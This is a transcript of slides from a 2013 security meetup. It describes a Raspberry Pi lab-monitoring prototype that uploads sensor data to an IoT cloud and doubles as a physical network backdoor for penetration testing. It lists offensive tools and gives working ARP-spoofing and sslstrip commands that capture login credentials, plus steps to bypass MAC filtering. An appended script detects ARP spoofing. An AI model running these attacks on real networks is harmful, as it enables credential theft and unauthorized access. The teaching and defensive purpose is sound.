The LabRat - Physical backdoor hacks and IOT primer




null Bangalore Chapter - July 2013 Meet





    Presentation Transcript

    • The LabRat: Physical Backdoor Hacks and Internet of Things (IOT) Primer. Akshat Sharma, TME, Cisco Systems.
    • The Raspberry Pi
      - http://www.raspberrypi.org/downloads : image downloads and updates
      - http://elinux.org/RPi_Low-level_peripherals : working with GPIO
      - http://elinux.org/RPiconfig : interfacing with screens
      Google’s your best friend.
    • Raspberry Pi as a Physical Backdoor into your network
      http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
      It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello
      - Rogue APs
      - MAC spoofing on wired networks
      - MITM attacks
    • The LabRat Circuit [circuit diagram; labels: Temperature Sensor, Humidity Sensor, Optical Fiber Tester, IR LED - Receiver, Optical Fiber, Binary Signal In, CH0, CH1, CH2, CH3, CLK, CS (AL), MOSI, MISO]
    • The LabRat - a Proof of Concept Prototype. The Raspberry Pi, a $35 Linux computer, powers the LabRat prototype. For more info on the Raspberry Pi, visit http://www.raspberrypi.org/
    • The LabRat Prototype: Current Setup
      - 10 inch capacitive touchscreen
      - Optical fiber tester
      - Humidity sensor
      - Temperature sensor
      - Raspberry Pi
      - HDMI-to-LVDS converter board
      - 10,000 mAh lithium polymer battery
    • The LabRat Prototype: Temperature Sensor (LM 35 + ADS7841)
      - LM 35 temperature sensor
      - ADS7841 analog-to-digital converter
    • The LabRat Prototype: Humidity Sensor (SMD + ADS7841)
      - ADS7841 analog-to-digital converter
      - Humidity sensor SMD
    • The LabRat Prototype: Optical Fiber Tester
      - Optical fiber holders
      - Infra-red LED-Receiver combination to transmit messages via the fiber
    • Connecting to an IOT Cloud
      - https://xively.com/
      - Formerly Cosm, Pachube
    • Set up a Cosm (now Xively) Account
      - Register on Cosm (Xively) and add a device
      - You will receive an API key and feed ID
      - Now use the old Cosm eeml library to set up datastreams from the Raspberry Pi
    • Setting up the Python Script to send Data to Xively
      Install the EEML package from GitHub:
          sudo apt-get install python-dev
          sudo apt-get install python-pip
          sudo easy_install -U distribute
          sudo pip install rpi.gpio    # to work with the RPi GPIO pins
          wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master
          tar zxvf geekman-python-eeml.tar.gz
          cd geekman-python-eeml*
          sudo python setup.py install
      Set up the Python script:
          # source eeml package
          import eeml
          # <snip>
          API_KEY = 'YOUR_API_KEY'
          FEED = YOUR_FEED_ID
          API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)
    • The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297
    • The LabRat Prototype: Python Scripts
      1) A Python script uploads the temperature and humidity data to an online cloud-based feed, showing how the LabRat may, in the future, do the same with sensor data at customer labs to provide real-time analytics.
      2) The same Python script sends an email to lab admins whenever the temperature or humidity values exceed a pre-decided threshold.
      3) Another Python script sends messages (binary data) through an optical fiber using an infrared LED-Receiver combination and emails the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
    • The LabRat Prototype: Current List of Penetration-Testing Tools
      - Information Gathering: wireshark, tcpflow, ngrep, hostmap, kismet, btscanner, sslscan, sslstrip, sslsniff, ssldump, tcptraceroute, netmask, tcpdump, zenmap, nmap, arp-fingerprint, dnswalk, dnstracer
      - Vulnerability Assessment: airodump-ng, sqlmap, nikto, svcrack
      - Exploitation Tools: aircrack-ng, airmon-ng, airodump-ng, aireplay-ng, sqlninja, exploit-db
      - Privilege Escalation: wireshark, ettercap, tcpreplay, tcpick, packit, packeth, dsniff
      - Maintaining Access: ptunnel, netcat, ftp-proxy, udp-tunnel, proxychains, dns2tcp
    • DEMO
      - Arp Spoofing using SSLstrip and arpspoof
      - Mac Spoofing using Airmon-ng and macchanger
      - Packet Sniffing using Wireshark
      - Other MITM attacks
    • Arp Spoofing and Mac-Spoofing Attacks
      Arp Spoofing
      - Set up port forwarding:
            iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
            echo '1' > /proc/sys/net/ipv4/ip_forward
      - Start Arp spoofing. Spoof the gateway:
            arpspoof -i wlan0 <gateway address>
      - Start sslstrip and log user information (use the -k option to log out users from their current sessions, forcing them to re-login):
            sslstrip -k -l 8080
      Mac Spoofing on Wifi (How to bypass Mac Filtering)
      - ifconfig eth0 down
      - airmon-ng start wlan0
      - iwlist wlan0 scanning
      - airodump-ng -c 6 -a --bssid <mac address of wireless access point>    # gives info on connected devices
      - ifconfig wlan0 down
      - Now use macchanger:
            macchanger -m <mac of allowed devices> wlan0
      - ifconfig wlan0 up
    • Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
    • Thank You
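
Added example (not part of the original slides): the Arp Spoofing demo rebinds the gateway's IP address to another MAC through forged ARP replies, which a monitor on the same segment can watch for. The sketch below flags that pattern over constructed tcpdump-style ARP reply lines; the sample addresses, the exact log layout and the `detect_arp_spoofing` name are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample: ARP replies in the style of tcpdump output (not real traffic).
SAMPLE = """\
10:00:01.100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
10:00:02.200 ARP, Reply 192.168.1.23 is-at de:ad:be:ef:00:23, length 28
10:00:05.300 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:23, length 28
10:00:06.300 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:23, length 28
10:00:07.000 ARP, Reply 192.168.1.40 is-at 00:aa:bb:cc:dd:40, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) "
    r"is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def detect_arp_spoofing(lines, pinned=None):
    """Return (timestamp, kind, ip, mac) alerts for suspicious ARP replies.
    pinned: optional {ip: mac} of known-good bindings, e.g. the gateway.
    Bindings can change legitimately (DHCP, failover), so alerts are leads."""
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    ip_to_mac = {}                    # last MAC seen for each IP
    mac_to_ips = defaultdict(set)     # every IP a MAC has claimed
    seen, alerts = set(), []

    def alert(ts, kind, ip, mac):
        if (kind, ip, mac) not in seen:   # report each finding once
            seen.add((kind, ip, mac))
            alerts.append((ts, kind, ip, mac))

    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue                      # not an ARP reply line
        ts, ip, mac = m["ts"], m["ip"], m["mac"].lower()
        if ip in pinned and pinned[ip] != mac:
            alert(ts, "pinned-mismatch", ip, mac)
        if ip in ip_to_mac and ip_to_mac[ip] != mac:
            alert(ts, "binding-changed", ip, mac)
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:      # one NIC answering for several IPs
            alert(ts, "mac-claims-multiple-ips", ip, mac)
    return alerts

if __name__ == "__main__":
    for a in detect_arp_spoofing(SAMPLE.splitlines(), {"192.168.1.1": "00:11:22:33:44:55"}):
        print(a)
```

Pinning the gateway's MAC (the `pinned` argument) catches a forged binding even when the monitor starts after the spoofing has begun, which the change-based checks alone would miss.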